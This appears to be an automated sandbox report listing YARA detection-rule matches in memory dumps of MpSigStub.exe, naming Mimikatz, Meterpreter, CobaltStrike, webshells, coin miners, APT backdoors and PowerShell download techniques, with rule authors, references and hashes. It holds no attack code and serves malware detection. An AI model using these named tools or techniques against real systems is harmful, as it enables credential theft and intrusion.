    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPEMatched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
    Source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPEMatched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
    Source: 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORYMatched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
    Source: 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
    Source: 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
    Source: 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
    Source: 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
    Source: 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp, type: MEMORYMatched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
    Source: 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
    Source: 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
    Source: 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp, type: MEMORYMatched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
    Source: 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
    Source: 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp, type: MEMORYMatched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, type: MEMORYMatched rule: APT9002Strings author = Seth Hardy, description = 9002 Identifying Strings, last_modified = 2014-06-25
    Source: 00000023.00000003.6409405553.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6409405553.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6278239354.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORYMatched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
    Source: 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORYMatched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
    Source: 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6343112775.0000028BD6735000.00000004.00000001.sdmp, type: MEMORYMatched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
    Source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORYMatched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORYMatched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
    Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORYMatched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
    Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
    Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORYMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
    Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORYMatched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Ham_backdoor author = Cylance Spear Team, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
    Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORYMatched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
    Source: 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
    Source: 00000023.00000003.6347513149.0000028BD7280000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
    Source: 00000023.00000003.6347513149.0000028BD7280000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6347513149.0000028BD7280000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
    Source: 00000023.00000003.6345125997.0000028BD6D56000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
    Source: 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
    Source: 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6399408556.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6399408556.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
    Source: 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, type: MEMORYMatched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
    Source: 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
    Source: 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
    Source: 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
    Source: 00000023.00000003.6298208897.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORYMatched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
    Source: 00000023.00000003.6316751945.0000028BD7A3C000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
    Source: 00000023.00000003.6407852134.0000028BD6E91000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6407852134.0000028BD6E91000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, type: MEMORYMatched rule: CVE_2018_4878_0day_ITW Description = This signature is mostly public sourced and detects an in-the-wild exploit for CVE-2018-4878., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
    Source: 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
    Source: 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp, type: MEMORYMatched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
    Source: 00000023.00000003.6324858901.0000028BD71BA000.00000004.00000001.sdmp, type: MEMORYMatched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6408458380.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6408458380.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6287398810.0000028BD6B04000.00000004.00000001.sdmp, type: MEMORYMatched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
    Source: 00000023.00000003.6328967380.0000028BD6126000.00000004.00000001.sdmp, type: MEMORYMatched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
